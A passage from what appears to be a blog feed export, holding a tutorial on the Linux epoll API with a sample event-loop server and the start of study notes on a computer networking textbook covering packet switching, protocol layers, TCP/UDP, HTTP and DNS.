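limited by FD_SETSIZE.</li><li>poll: much the same as above; it polls every socket with $O(n)$ time complexity, but has no fixed limit on the number of fds, because the caller passes an array of <code>struct pollfd</code> of arbitrary length instead of a fixed-size bitmap.</li><li>epoll: <strong>event driven</strong>. epoll tells the user <strong>which stream</strong> had <strong>which I/O event</strong>. Time complexity is $O(1)$ with respect to the number of monitored fds.</li></ul></li><li><p>epoll provides two trigger modes</p><ul><li>Level-triggered (LT), the traditional select/poll behaviour and the default mode, which supports both <strong>blocking</strong> and <strong>non-blocking</strong> sockets. Once a file descriptor becomes ready, the kernel <strong>keeps notifying</strong> the user until it is no longer ready.</li><li>Edge-triggered (ET), the high-performance mode, which should be used only with <strong>non-blocking</strong> sockets. The kernel notifies the user through epoll when a file descriptor <strong>changes</strong> from not ready to ready. <strong>Note that it notifies only once</strong>: the notification fires only at the moment the descriptor goes from not ready to ready. If a ready file descriptor is left unhandled and therefore stays ready, it will <strong>not</strong> trigger another notification.</li></ul></li></ul><span id="more"></span><h2 id="二、相关函数-用法">II. Functions &amp; Usage</h2><h3 id="1-epoll-API-概述">1. 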
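Overview of the epoll API</h3><ul><li><p>The central concept of the epoll API is the <strong>epoll instance</strong>, an in-kernel data structure. From the user-space perspective, it can be viewed as a container for two lists:</p><ul><li><p>The <strong>interest</strong> list (sometimes also called the epoll set): the set of file descriptors that the process has <strong>registered an interest</strong> in monitoring.</p><blockquote><p>“Interest” is awkward to translate; it can simply be thought of as a working list.</p><p>For ease of explanation, the interest list is referred to as the <strong>working list</strong> in the rest of this post.</p></blockquote></li><li><p>The <strong>ready</strong> list: a set of references to the subset of file descriptors in the working list that are ready for I/O. When I/O activity occurs on a file descriptor in the working list, the kernel dynamically adds that descriptor to the ready list.</p></li></ul></li><li><p>The following functions operate on an epoll instance</p><ul><li><code>epoll_create</code>: creates a new epoll instance and returns a file descriptor referring to that <strong>epoll instance</strong>.</li><li><code>epoll_ctl</code>: adds, modifies, or removes entries in the <strong>working list</strong> of an epoll instance.</li><li><code>epoll_wait</code>: waits for I/O events, blocking if no events are currently available (that is, if the ready list is empty).</li></ul></li><li><p><strong>Level-triggered</strong> and <strong>edge-triggered</strong></p><p>Consider the following scenario:</p><ol><li>The file descriptor rfd, the read end of a pipe, is registered with the epoll instance.</li><li>The writer at the other end of the pipe writes 2 kB of data into the pipe.</li><li><code>epoll_wait</code> is called to wait for I/O events and returns rfd.</li><li>The reader reads 1 kB of data from rfd.</li><li><code>epoll_wait</code> is called again. What happens?</li></ol><p>If rfd was registered with the epoll instance in <strong>edge-triggered mode (EPOLLET)</strong>, the call in step 5 <strong>will block</strong> <strong>even though unread data remains</strong>, because edge-triggered mode delivers events only when a change occurs on the monitored file descriptor.</p><p>With edge-triggered mode it is best to use <strong>non-blocking file descriptors</strong>, so that a blocking read or write does not starve the tasks handling other file descriptors.</p><p>In <strong>level-triggered mode</strong>, the call in step 5 does not block; it returns rfd, because unread data is still present in the buffer.</p></li><li><p>A simple example</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 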
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MAX_EVENTS 10</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">epoll_event</span> ev, events[MAX_EVENTS];</span><br><span class="line"><span class="type">int</span> listen_sock, conn_sock, nfds, epollfd;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Code to set up listening socket, &#x27;listen_sock&#x27;,</span></span><br><span class="line"><span class="comment">              (socket(), bind(), listen()) omitted */</span></span><br><span class="line"></span><br><span class="line">epollfd = <span class="built_in">epoll_create1</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (epollfd == <span class="number">-1</span>) &#123;</span><br><span class="line">    <span class="built_in">perror</span>(<span 
class="string">&quot;epoll_create1&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">ev.events = EPOLLIN;</span><br><span class="line">ev.data.fd = listen_sock;</span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">epoll_ctl</span>(epollfd, EPOLL_CTL_ADD, listen_sock, &amp;ev) == <span class="number">-1</span>) &#123;</span><br><span class="line">    <span class="built_in">perror</span>(<span class="string">&quot;epoll_ctl: listen_sock&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    nfds = <span class="built_in">epoll_wait</span>(epollfd, events, MAX_EVENTS, <span class="number">-1</span>);</span><br><span class="line">    <span class="keyword">if</span> (nfds == <span class="number">-1</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;epoll_wait&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (n = <span class="number">0</span>; n &lt; nfds; ++n) &#123;</span><br><span class="line">        <span class="keyword">if</span> (events[n].data.fd == listen_sock) &#123;</span><br><span class="line">            conn_sock = <span class="built_in">accept</span>(listen_sock,</span><br><span class="line">                               (<span class="keyword">struct</span> sockaddr *) &amp;addr, &amp;addrlen);</span><br><span class="line">            <span class="keyword">if</span> (conn_sock == <span class="number">-1</span>) 
&#123;</span><br><span class="line">                <span class="built_in">perror</span>(<span class="string">&quot;accept&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">setnonblocking</span>(conn_sock);</span><br><span class="line">            ev.events = EPOLLIN | EPOLLET;</span><br><span class="line">            ev.data.fd = conn_sock;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">epoll_ctl</span>(epollfd, EPOLL_CTL_ADD, conn_sock,</span><br><span class="line">                          &amp;ev) == <span class="number">-1</span>) &#123;</span><br><span class="line">                <span class="built_in">perror</span>(<span class="string">&quot;epoll_ctl: conn_sock&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">do_use_fd</span>(events[n].data.fd);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Notes</p><ul><li>Two different epoll instances can wait on the same file descriptor. When an event occurs on that descriptor, both epoll instances receive it.</li><li>The file descriptor of one epoll instance can be registered in the interest list of another epoll instance, but not in its own.</li><li>The epoll API is <strong>Linux-specific</strong>.</li></ul></li></ul><h3 id="2-epoll-create">2. 
epoll_create</h3><ul><li><p>Declaration</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/epoll.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_create</span><span class="params">(<span class="type">int</span> size)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_create1</span><span class="params">(<span class="type">int</span> flags)</span></span>; <span class="comment">// Same as epoll_create with the obsolete size dropped; flags may be 0 or EPOLL_CLOEXEC.</span></span><br></pre></td></tr></table></figure></li><li><p>Purpose: opens a file descriptor that refers to a new <strong>epoll instance</strong>. This descriptor is then passed to every other function in the epoll family. When it is no longer needed, close it with <code>close</code>.</p></li><li><p>Parameter size: the <strong>number</strong> of file descriptors the caller expects to add to the epoll instance. The kernel used this number as a <strong>hint</strong> for how much space to allocate initially for the internal data structures that hold events.</p><blockquote><p>Since Linux 2.6.8 the size argument of epoll_create is ignored, because the kernel now resizes the required data structures dynamically and needs no hint.</p><p>However, <strong>size must still be greater than 0</strong>, for backward compatibility.</p></blockquote></li><li><p>Return value</p><p>On success, returns a non-negative file descriptor. On failure, returns -1 and sets errno.</p></li></ul><h3 id="3-epoll-ctl">3. 
epoll_ctl</h3><ul><li><p>Declaration</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/epoll.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_ctl</span><span class="params">(<span class="type">int</span> epfd, <span class="type">int</span> op, <span class="type">int</span> fd, <span class="keyword">struct</span> epoll_event *event)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>Purpose: <strong>adds, modifies or removes</strong> an <strong>entry</strong> in the <strong>interest list</strong> maintained by epfd, by performing <strong>operation op</strong> on the <strong>target descriptor fd</strong>.</p></li><li><p>Parameters</p><ul><li><p>epfd: file descriptor of the epoll instance to operate on.</p></li><li><p>op: the operation, one of:</p><ul><li><strong>EPOLL_CTL_ADD</strong>: associate fd with the settings in event and add it to the interest list of epfd.</li><li><strong>EPOLL_CTL_MOD</strong>: replace the settings associated with fd with those in event.</li><li><strong>EPOLL_CTL_DEL</strong>: remove fd from the interest list. The event argument is ignored.</li></ul></li><li><p>fd: the target file descriptor.</p></li><li><p>event: the epoll event structure.</p><p>The structure is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">union</span> <span class="title class_">epoll_data</span> &#123;</span><br><span class="line">    <span class="type">void</span>        *ptr;</span><br><span class="line">    <span 
class="type">int</span>          fd;</span><br><span class="line">    <span class="type">uint32_t</span>     u32;</span><br><span class="line">    <span class="type">uint64_t</span>     u64;</span><br><span class="line">&#125; <span class="type">epoll_data_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">epoll_event</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span>     events;      <span class="comment">/* Epoll events */</span></span><br><span class="line">    <span class="type">epoll_data_t</span> data;        <span class="comment">/* User data variable */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The <code>events</code> field is a <strong>bitwise OR of event flags</strong>. The main flags are:</p><ul><li><p><strong>EPOLLIN</strong>: the associated fd is available for read operations.</p></li><li><p><strong>EPOLLOUT</strong>: the associated fd is available for write operations.</p></li><li><p><strong>EPOLLRDHUP</strong>: the remote peer closed the connection (or shut down its writing half). This flag is especially useful for detecting a closed connection in <strong>edge-triggered mode</strong>.</p></li><li><p><strong>EPOLLET</strong>: use edge-triggered mode for the associated fd. The default is level-triggered mode.</p></li><li><p><strong>EPOLLONESHOT</strong>: one-shot behaviour for the associated fd. After epoll_wait has delivered an event for the fd, the fd is disabled internally and epoll reports no further events for it.</p><p>This is very useful for sockets: even in ET mode, an event on the same socket can fire more than once. One-shot mode lets you finish handling the current event on a socket before the next event on that socket is delivered, so events are processed in order.</p><p>Once handling is complete, the user must re-arm the fd manually by calling epoll_ctl with EPOLL_CTL_MOD.</p></li><li><p><strong>EPOLLEXCLUSIVE</strong>: when several epoll instances are attached to the same fd, by default every one of them receives the event when the fd becomes ready. With EPOLLEXCLUSIVE set, each event <strong>wakes at least one of them rather than all</strong>, which avoids the <strong>thundering herd</strong> problem.</p></li></ul></li></ul></li><li><p>Return value</p><ul><li>On success, epoll_ctl returns 0.</li><li>On error, it returns -1 and sets errno.</li></ul></li></ul><h3 id="4-epoll-wait">4. 
epoll_wait</h3><ul><li><p>Declaration</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/epoll.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_wait</span><span class="params">(<span class="type">int</span> epfd, <span class="keyword">struct</span> epoll_event *events,</span></span></span><br><span class="line"><span class="params"><span class="function">               <span class="type">int</span> maxevents, <span class="type">int</span> timeout)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_pwait</span><span class="params">(<span class="type">int</span> epfd, <span class="keyword">struct</span> epoll_event *events,</span></span></span><br><span class="line"><span class="params"><span class="function">                <span class="type">int</span> maxevents, <span class="type">int</span> timeout,</span></span></span><br><span class="line"><span class="params"><span class="function">                <span class="type">const</span> <span class="type">sigset_t</span> *sigmask)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>Purpose: waits for events on an epoll instance.</p><p>The difference between <code>epoll_wait</code> and <code>epoll_pwait</code> is that <code>epoll_pwait</code> also takes a signal mask, so selected signals can be blocked for the duration of the wait.</p></li><li><p>Parameters</p><ul><li>epfd: descriptor of the epoll instance to wait on.</li><li>events: pointer to an <strong>array</strong> of epoll_event that receives the results.</li><li>maxevents: the maximum number of events to return in the <code>events</code> array. It <strong>must be greater than 0</strong>.</li><li>timeout: the maximum time to wait/block, in milliseconds. A value of <code>-1</code> makes the call <strong>block indefinitely</strong>; a value of 0 makes it return immediately, whether or not any events are available. The interval is measured against the <strong>CLOCK_MONOTONIC</strong> clock.</li></ul></li><li><p>Return value</p><ul><li><p>On success, returns the <strong>number</strong> of file descriptors that are <strong>ready</strong> (in practice this can be treated as the number of events).</p></li><li><p>If the wait times out, returns 0, meaning no file descriptor is ready.</p></li><li><p>On error, returns -1 and sets errno.</p><blockquote><p>Note: if the wait is interrupted by a signal, errno is set to EINTR.</p></blockquote></li></ul></li><li><p>Other notes</p><ul><li><p>In a returned epoll_event, the events field may carry the following error flags set by the epoll API:</p><ul><li><strong>EPOLLERR</strong>: an error occurred on the associated fd. It is also reported on the local write end when the read end on the remote side has been closed.</li><li><strong>EPOLLHUP</strong>: a hang-up occurred on the associated fd. This event only indicates that the remote peer closed the connection; after the remaining data in the channel has been read, the reader receives an EOF.</li></ul></li><li><p>The <strong>data field</strong> of each returned epoll_event is the same <strong>data field</strong> that was specified for the corresponding open file description in the most recent epoll_ctl call (EPOLL_CTL_ADD or EPOLL_CTL_MOD). The <strong>events field</strong> contains the bit flags of the <strong>events that occurred</strong>.</p><p><strong>epoll_event::data</strong> is a value carried along with the event, much like the argument passed to a thread entry function in multithreaded code.</p></li><li><p>The ready list of an epoll instance may hold several events at once. A call to epoll_wait returns <strong>all of them</strong> in one batch, capped at maxevents, <strong>not</strong> one event per call.</p></li><li><p>Following on from the previous point: if more than maxevents descriptors are ready, successive epoll_wait calls round-robin through the <strong>set of ready file descriptors</strong>. This helps prevent starvation, where a process <strong>concentrates on one known set of ready descriptors</strong> and fails to notice others becoming ready.</p></li><li><p>epoll_wait can still be called when the interest list of the epoll instance is empty. The call blocks until <strong>a file descriptor is added to the interest list and becomes ready</strong>.</p></li></ul></li></ul><h2 id="三、参考链接">III. References</h2><ul><li><a href="https://baike.baidu.com/item/epoll/10738144?fr=aladdin">epoll - 百度百科</a></li><li><a href="https://blog.csdn.net/armlinuxww/article/details/92803381">Epoll原理解析 - CSDN</a></li><li><a href="https://www.cnblogs.com/aspirant/p/9166944.html">select、poll、epoll之间的区别(搜狗面试) - cnblog</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、概述&quot;&gt;I. Overview&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
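&lt;p&gt;epoll is the Linux kernel's improved poll for handling large numbers of file descriptors, an enhanced version of the select/poll I/O multiplexing interfaces on Linux. It markedly improves CPU efficiency for programs that hold many concurrent connections of which only a few are active at any moment.&lt;/p&gt;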
&lt;/li&gt;
&lt;li&gt;
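&lt;p&gt;A server has to manage connections from many clients, but recv can only wait on a single socket, which is why select/poll were introduced.&lt;/p&gt;
&lt;p&gt;However, select can monitor at most FD_SETSIZE file descriptors, usually 1024. That is clearly not enough for a server handling tens of thousands of concurrent connections. By contrast, the fd limit for epoll is the maximum number of files that can be opened, which can be read with &lt;code&gt;cat /proc/sys/fs/file-max&lt;/code&gt; (on my machine the value is &lt;code&gt;9223372036854775807&lt;/code&gt;).&lt;/p&gt;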
&lt;/li&gt;
&lt;li&gt;
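&lt;p&gt;Even when only some sockets are &lt;strong&gt;active&lt;/strong&gt;, traditional select/poll &lt;strong&gt;scans&lt;/strong&gt; the whole socket set &lt;strong&gt;linearly&lt;/strong&gt;, so efficiency drops linearly as the number of sockets grows. This is also why select caps the number of monitored descriptors: after waking up, the program does not know which socket is active and has to iterate over all of them.&lt;/p&gt;
&lt;p&gt;epoll, in contrast, is built on a callback attached to each fd, so only active sockets are processed, which is more efficient.&lt;/p&gt;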
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Differences between select, poll and epoll&lt;/p&gt;
&lt;ul&gt;
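&lt;li&gt;select: it only knows that some I/O event occurred, not on which descriptor, so it has to scan every stream indiscriminately. Time complexity $O(n)$; the number of fds is limited to FD_SETSIZE.&lt;/li&gt;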
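&lt;li&gt;poll: much the same as above, it polls every socket with time complexity $O(n)$, but there is no fixed limit on the number of fds, because the caller passes a variable-length array of pollfd entries (kept in a linked list inside the kernel) instead of a fixed-size bitmap.&lt;/li&gt;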
&lt;li&gt;epoll: &lt;strong&gt;event-driven&lt;/strong&gt;. epoll tells the user &lt;strong&gt;which stream&lt;/strong&gt; had &lt;strong&gt;which I/O event&lt;/strong&gt;. Time complexity $O(1)$.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;epoll offers two trigger modes&lt;/p&gt;
&lt;ul&gt;
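&lt;li&gt;The first is level-triggered (LT), the behaviour of traditional select/poll and the default mode. It supports both &lt;strong&gt;blocking&lt;/strong&gt; and &lt;strong&gt;non-blocking&lt;/strong&gt; sockets. Once a file descriptor is ready, the kernel &lt;strong&gt;keeps notifying&lt;/strong&gt; the user until it becomes not ready again.&lt;/li&gt;
&lt;li&gt;The second is edge-triggered (ET), the high-speed mode, which only supports &lt;strong&gt;non-blocking&lt;/strong&gt; sockets. When a file descriptor &lt;strong&gt;changes&lt;/strong&gt; from not ready to ready, the kernel notifies the user through epoll. &lt;strong&gt;Note that it notifies only once.&lt;/strong&gt; The notification fires only at the moment of the transition from not ready to ready. If a ready file descriptor is left unhandled and simply stays ready, it will &lt;strong&gt;not&lt;/strong&gt; trigger any further notification.&lt;/li&gt;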
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="Project" scheme="https://kiprey.github.io/categories/Project/"/>
    
    <category term="WebServer" scheme="https://kiprey.github.io/categories/Project/WebServer/"/>
    
    
    <category term="WebServer" scheme="https://kiprey.github.io/tags/WebServer/"/>
    
  </entry>
  
  <entry>
    <title>Computer Networking Notes - 1</title>
    <link href="https://kiprey.github.io/2021/05/cnatda-1/"/>
    <id>https://kiprey.github.io/2021/05/cnatda-1/</id>
    <published>2021-05-15T03:12:44.000Z</published>
    <updated>2025-11-24T03:59:39.821Z</updated>
    
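    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are my notes from reading <em>Computer Networking: A Top-Down Approach</em>. They are abridged.</li><li>They mainly cover<ul><li>Chapter 1: Computer Networks and the Internet</li><li>Chapter 2: Application Layer</li><li>Chapter 3: Transport Layer</li></ul></li></ul><span id="more"></span><h2 id="第一章：计算机网络和因特网">Chapter 1: Computer Networks and the Internet</h2><ul><li><p>All networked devices are called <strong>hosts</strong> or <strong>end systems</strong>.</p></li><li><p>End systems are connected by <strong>communication links</strong> and <strong>packet switches</strong>.</p><ul><li>The two best-known kinds of packet switch are <strong>routers</strong> and <strong>link-layer switches</strong>.</li><li>The sequence of <strong>communication links</strong> and <strong>packet switches</strong> that a packet traverses is called a <strong>route</strong> or <strong>path</strong> through the network.</li></ul></li><li><p>The network core</p><blockquote><p>There are two fundamental ways to move data through a network of links and switches: <strong>circuit switching</strong> and <strong>packet switching</strong>.</p></blockquote><ul><li><p>Packet switching:</p><p><img src="/2021/05/cnatda-1/image-20210507194417422.png" alt="image-20210507194417422"></p><ul><li><p>In network applications, end systems exchange <strong>messages</strong> with each other. A message can contain anything the protocol designer needs, such as control information or data.</p></li><li><p>To send a message from a source end system to a destination end system, the source breaks a long message into smaller chunks of data called <strong>packets</strong>.</p></li><li><p>Most packet switches use <strong>store-and-forward transmission</strong> at the inputs to their links: the switch must receive the entire packet before it can begin transmitting the first bit of that packet onto the outbound link.</p><p><img src="/2021/05/cnatda-1/image-20210507193626489.png" alt="image-20210507193626489"></p></li><li><p>Queuing delay and packet loss</p><ul><li>Each packet switch has several links attached to it. For each attached link, the switch has an <strong>output buffer (output queue)</strong> that stores packets the router is about to send onto that link.</li><li>If an arriving packet needs to go out on a link that is busy transmitting another packet, it must wait in the output buffer. So in addition to store-and-forward delay, packets suffer output-buffer <strong>queuing delay</strong>. If the buffer is completely full, <strong>packet loss</strong> occurs.</li></ul></li></ul></li><li><p>Circuit switching</p><ul><li><p>When two hosts communicate, the network establishes a dedicated end-to-end connection between them. A circuit must therefore first be reserved on each of the links between the two hosts.</p><p><img src="/2021/05/cnatda-1/image-20210507194445844.png" 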
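alt="image-20210507194445844"></p></li><li><p>Multiplexing in circuit-switched networks</p><blockquote><p>A circuit in a link is implemented with either <strong>frequency-division multiplexing (FDM)</strong> or <strong>time-division multiplexing (TDM)</strong>.</p></blockquote><ul><li><p>With FDM, the frequency spectrum of a link is shared among all connections established across it, and each connection gets <strong>a dedicated frequency band</strong>, as with radio stations.</p></li><li><p>With TDM, time is divided into frames of fixed duration and each frame into a fixed number of time slots. When the network establishes a connection across a link, it assigns that connection one time slot in every frame. Those slots are used exclusively by that connection.</p></li></ul><p><img src="/2021/05/cnatda-1/image-20210507195514761.png" alt="image-20210507195514761"></p></li></ul></li><li><p>Packet switching is more efficient than circuit switching:</p><ul><li>It shares bandwidth better.</li><li>It is simpler, more efficient and cheaper.</li></ul><p>Circuit switching pre-allocates link capacity regardless of demand, which is inefficient. Packet switching allocates link use on demand, which is more efficient.</p></li></ul></li><li><p>Delay in packet switching</p><ul><li><p><strong>Nodal processing delay</strong>: the time needed to examine the packet header and decide where to direct the packet, plus the time for bit-level error checking and similar work.</p></li><li><p><strong>Queuing delay</strong>: the time a packet spends in the queue waiting to be transmitted onto the link. The queuing delay of a particular packet depends on how many earlier-arriving packets are queued for the same link.</p></li><li><p><strong>Transmission delay</strong>: the time needed to <strong>push all of the packet's bits</strong> <strong>onto the link</strong>. It is proportional to packet size: $L/R$ for a packet of $L$ bits on a link of rate $R$ bits per second.</p></li><li><p><strong>Propagation delay</strong>: the time needed to propagate from the start of the link to the next router.</p><blockquote><p>Note: transmission delay and propagation delay are not the same thing; the two concepts are entirely different.</p></blockquote></li></ul><blockquote><p>The sum of the four is the <strong>total delay</strong>. $d_{nodal}=d_{proc}+d_{queue}+d_{trans}+d_{prop}$</p></blockquote></li><li><p>Protocol layering</p><ul><li><p><strong>Application layer</strong>: where network applications and their application-layer protocols live, for example HTTP and SMTP.</p></li><li><p><strong>Transport layer</strong>: carries application-layer messages between application endpoints. There are two transport protocols:</p><ul><li><strong>TCP</strong>: breaks long messages into shorter segments and provides congestion control.</li><li><strong>UDP</strong>: provides a connectionless, no-frills service to applications, with no reliability, no flow control and no congestion control.</li></ul><p>A transport-layer packet is called a <strong>segment</strong>.</p></li><li><p><strong>Network layer</strong>: responsible for moving network-layer packets, called <strong>datagrams</strong>, from one host to another. <strong>The network layer includes the well-known Internet Protocol, IP.</strong></p></li><li><p><strong>Link layer</strong>: the network layer <strong>routes (note: a verb here)</strong> datagrams through a series of routers between source and destination. To move a packet from one node to the next node on the path, the network layer relies on the services of the link layer.</p><p>A link-layer packet is called a <strong>frame</strong>. The job of the link layer is to move an <strong>entire frame</strong> from one network element to an adjacent one. The service provided depends on the specific link-layer protocol used on the link.</p></li><li><p><strong>Physical layer</strong>: the job of the physical layer is to move the individual bits of each frame from one node to the next. Its protocols depend on the link, and further on the link's <strong>actual transmission medium</strong>, for example twisted-pair copper wire or single-mode fiber.</p></li></ul><p>Taken together, the protocols of all the layers are called the <strong>protocol stack</strong>.</p><p><img src="/2021/05/cnatda-1/image-20210507202004763.png" alt="image-20210507202004763"></p></li></ul><h2 id="第二章：应用层">Chapter 2: Application Layer</h2><h3 id="1-因特网提供的运输服务">1. Transport services provided by the Internet</h3><ul><li><p>TCP service</p><ul><li><p><strong>Connection-oriented service</strong>:</p><p>Before application-layer messages begin to flow, TCP has the client and server exchange <strong>transport-layer</strong> control information. This handshake alerts both sides to prepare for an onslaught of packets.</p><p>After the three-way handshake, a <strong>TCP connection</strong> exists between the two processes. The connection is <strong>full-duplex</strong>: both sides can <strong>send and receive messages at the same time</strong> over it.</p><p>When the application finishes sending messages, the connection must be torn down.</p></li><li><p><strong>Reliable data transfer service</strong>:</p><p>The communicating processes can rely on TCP to deliver all data sent without error and in the proper order, with no missing or duplicate bytes.</p></li><li><p>It includes a congestion-control mechanism.</p></li></ul><blockquote><p><strong>Secure Sockets Layer (SSL)</strong>: an enhancement of TCP that adds encryption.</p><p>SSL has its own socket API. The application passes cleartext data to the SSL socket; SSL in the sending host encrypts the data and passes the encrypted data to the <strong>sending TCP socket</strong>. The receiving socket gets the encrypted data, SSL decrypts it, and the cleartext is passed through the SSL socket to the receiving process.</p></blockquote></li><li><p>UDP service</p><ul><li>A no-frills, lightweight transport protocol that provides only minimal services.</li><li>UDP is connectionless, so there is no handshake before the two processes communicate.</li><li>UDP provides an unreliable data transfer service: it <strong>does not guarantee that a message reaches the receiving process</strong>, and messages that do arrive <strong>may arrive out of order</strong>. It has no congestion control.</li></ul></li></ul><h3 id="2-应用层协议">2. Application-layer protocols</h3><h4 id="a-http">a. 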
http</h4><ul><li><p>A sample <strong>request message</strong>:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GET /somedir/page.html HTTP/1.1</span><br><span class="line">Host: www.someschool.edu</span><br><span class="line">Connection: close</span><br><span class="line">User-agent: Mozilla/5.0</span><br><span class="line">Accept-language: fr</span><br></pre></td></tr></table></figure><p>The general format of a <strong>request message</strong> is:</p><p><img src="/2021/05/cnatda-1/image-20210507204906032.png" alt="image-20210507204906032"></p></li><li><p>A sample <strong>response message</strong>:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Connection: close</span><br><span class="line">Date: Tue, 18 Aug 2015 15:44:04 GMT</span><br><span class="line">Server: Apache/2.23 (CentOS)</span><br><span class="line">Last-Modified: Tue, 18 Aug 2015 15:11:03 GMT</span><br><span class="line">Content-Length: 6821</span><br><span class="line">Content-Type: text/html</span><br><span class="line"></span><br><span class="line">(data data data data data ...)</span><br></pre></td></tr></table></figure><p>Its general format is:</p><p><img src="/2021/05/cnatda-1/image-20210507205312687.png" alt="image-20210507205312687"></p></li><li><p><strong>Web caching</strong></p><ul><li><p>A Web cache, also called a proxy server, works as follows:</p><ul><li><p>The browser opens a TCP connection to the Web cache and sends it an HTTP request for the object.</p></li><li><p>The Web cache checks its storage</p><ul><li><p>If it has a copy of the object stored locally, it returns the object to the client browser in an HTTP response message.</p></li><li><p>If it does not have the object, it opens a TCP connection to the object's origin server and sends an HTTP request over that connection. On receiving the request, the origin server sends the object to the Web cache in an HTTP response.</p><p>When the Web cache receives the object, it stores a copy locally and sends a copy to the client browser in an HTTP response message.</p></li></ul></li></ul></li><li><p>A copy stored in the Web cache may be stale. HTTP lets the cache verify that its object is up to date with a <strong>conditional GET</strong>:</p><ul><li>the request message uses the GET method, and</li><li>the request message includes an If-Modified-Since header line.</li></ul><p>When the Web cache sends a <strong>conditional GET</strong> to the origin server:</p><ul><li>if the object has not changed, the response (304 Not Modified) has an empty body;</li><li>if the object has changed, the response carries the new object.</li></ul></li></ul></li></ul><h4 id="b-DNS">b. DNS</h4><ul><li><p>One way to identify a host is by its <strong>hostname</strong>.</p></li><li><p>DNS is</p><ul><li>a distributed database implemented by a hierarchy of DNS servers, and</li><li>an application-layer 